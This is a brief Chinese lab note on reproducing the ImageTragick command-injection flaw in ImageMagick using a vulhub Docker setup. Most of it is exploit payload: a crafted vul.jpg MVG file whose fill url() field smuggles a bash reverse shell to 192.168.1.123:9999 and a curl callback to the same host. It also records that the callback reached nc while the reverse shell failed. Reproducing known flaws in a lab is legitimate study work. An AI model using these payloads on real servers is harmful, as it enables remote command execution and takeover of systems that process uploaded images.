路径:/root/vulhub/imagemagick/imagetragick
搭建:docker-compose up -d
打开地址:存在三个文件demo.php upload.php vul.jpg
vul.jpg是攻击的模板
push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg"|bash -i >& /dev/tcp/192.168.1.123/9999 0>&1")'
pop graphic-context
打开upload.php文件进行上传操作
发现nc确实能够接收到curl的http请求
fill 'url(https://example.com/image.jpg"|curl -v 192.168.1.123:9999")'
然后自己尝试进行反弹shell
fill 'url(https://example.com/image.jpg"|bash -i >& /dev/tcp/192.168.1.123/9999 0>&1")'
发现不成功 原因未知 如果小伙伴们知道请告知下哈